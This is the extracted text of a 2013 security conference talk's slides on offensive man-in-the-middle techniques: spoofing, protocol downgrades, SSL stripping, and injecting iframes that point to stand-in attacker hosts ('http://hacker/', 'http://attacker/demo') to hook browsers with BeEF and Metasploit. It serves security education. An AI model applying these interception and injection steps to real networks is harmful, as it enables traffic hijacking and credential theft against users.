Offensive Man-in-the-MiddleNavaja Negra - AlbaceteOctubre 2013

Jose Selvi

10 years working in Security

Senior Penetration Tester at

SANS Institute Community Instructor

GIAC Security Expert (GSE)

Twitter: @JoseSelvi

Blog: http://www.pentester.es

$ whois jselvi

Disclaimer!

No user was (very) harmed in the making of this speach

Let’s Go!Man-in-the-Middle 101

The Passive approach

Downgrade Attacks

SSL Bypass

On-the-fly content injection

Cheating up users

Browser exploitation

Man-in-the-Middle

Man-in-the-Middle

ARP Spoofing

I’M THE ROUTER!

WHO’S THE ROUTER?

DHCP Spoofing

YOUR IP IS...

I WANT AN IP

ICMP Redirect

A NEW ROUTEFOR YOU

Much more...DNS Spoofing

Port Stealing

STP Mangling

Route Mangling

...

Even Social Engineering...

Let’s Go!Man-in-the-Middle 101

The Passive approach

Downgrade Attacks

SSL Bypass

On-the-fly content injection

Cheating up users

Browser exploitation

Just Sniffing...

Automated Analysis

Password Capture

Let’s Go!Man-in-the-Middle 101

The Passive approach

Downgrade Attacks

SSL Bypass

On-the-fly content injection

Cheating up users

Browser exploitation

Protocol Negotiation|@#|@#|@#|@#|#@

|@#|@#|@#|@# |@#|@#|#|#@|@#|@#|@#

Downgrade Attack

Y dice “a relaxing cup of cafe con leche” la tia... Calla, calla... que yo les

he dejado dinero...

Attacker

The SSHv1 Example

Client

OK, Let’s talk SSHv1

Server

I can speakv1 & v2

SSHv1

I can speakjust v1

Let’s Go!Man-in-the-Middle 101

The Passive approach

Downgrade Attacks

SSL Bypass

On-the-fly content injection

Cheating up users

Browser exploitation

Self-Signed Certificate

AttackerClient ServerHTTPS

HTTPS

SSL Striphttp://www.thoughtcrime.org/software/sslstrip/

By Moxie Marlinspike

Transparent proxy

HTTP to HTTPS Gateway

sed ‘s/https/http/g’

Usually all starts with an HTTP connection

SSL Strip

Attacker

Client Server

HTTP

HTTPS<body><img src=whatever.jpg><a href =</body>

https://myweb/login>

GET / HTTP/1.1

http://myweb/login>

DEMO

SSL VulnerabilitiesBEAST / CRIME

By Juliano Rizzo, Thai Duong

BREACH

By Angel Prado, Neal Harris, Yoel Gluck

Based on compression characteristics before encryption.

Chosen plaintext attack

It can decrypt secrets (cookie, csrf-token, etc).

Let’s Go!Man-in-the-Middle 101

The Passive approach

Downgrade Attacks

SSL Bypass

On-the-fly content injection

Cheating up users

Browser exploitation

Spanish model

Corp.C

Corp.A

Corp.B

Corp.D

The “K” Factor<body><img src=whatever.jpg>

</body><iframe src=http://hacker/>

<body><img src=whatever.jpg>

</body><iframe src=http://hacker/>

The Middlerhttps://code.google.com/p/middler/

By InGuardians

Transparent HTTP & SIP Proxy

Plugin based: Easy & Powerful

IFrame Injection

Last release from July 2009

Some fixes are needed...

but... that is why Python r00l3z :)

The Middler Plugins

Burp Suite / The Middler

Attacker

Client Server

HTTP

HTTP<body><img src=whatever.jpg>

</body><iframe src=http://hacker/>

GET / HTTP/1.1

Burp Suitehttp://portswigger.net/burp/

By PortSwigger

General interception proxy

Support transparent proxy

Support match/replace function

Best option if you have the Pro version

If not... you will lose your configuration when closing

Burp Suite

DEMO

Let’s Go!Man-in-the-Middle 101

The Passive approach

Downgrade Attacks

SSL Bypass

On-the-fly content injection

Cheating up users

Browser exploitation

BeEF & Metasploit

BeEF: Browser Exploitation Framework

http://beefproject.com/

Metasploit Framework

http://www.metasploit.com/

BeEF & MSF

GOOGLE BeEFMSF

VICTIM

<iframe src=http://attacker/demo

What to doFingerprinting

Redirect to another page

Capture NTLM

SMB Relay Attacks

Credential Theft

Request software installation

DEMO

Let’s Go!Man-in-the-Middle 101

The Passive approach

Downgrade Attacks

SSL Bypass

On-the-fly content injection

Cheating up users

Browser exploitation

Browser Vulnerabilities 2012Internet Explorer: 34

Mozilla Firefox: 99

Google Chrome: 68

Java Plugin: 32

Adobe Flash: 61

Adobe Reader: 25http://www.gfi.com/blog/wp-content/uploads/2013/02/Most-Targeted-Applications-in-2012.jpg

Metasploit Exploitation

GOOGLE MSF

VICTIM

<iframe src=http://attacker/demo

DEMO

Let’s Go!Man-in-the-Middle 101

The Passive approach

Downgrade Attacks

SSL Bypass

On-the-fly content injection

Cheating up users

Browser exploitation

Jose Selvihttp://twitter.com/JoseSelvi

jselvi@pentester.eshttp://www.pentester.es

jselvi@s21sec.comhttp://www.s21sec.com

Thanks! Questions?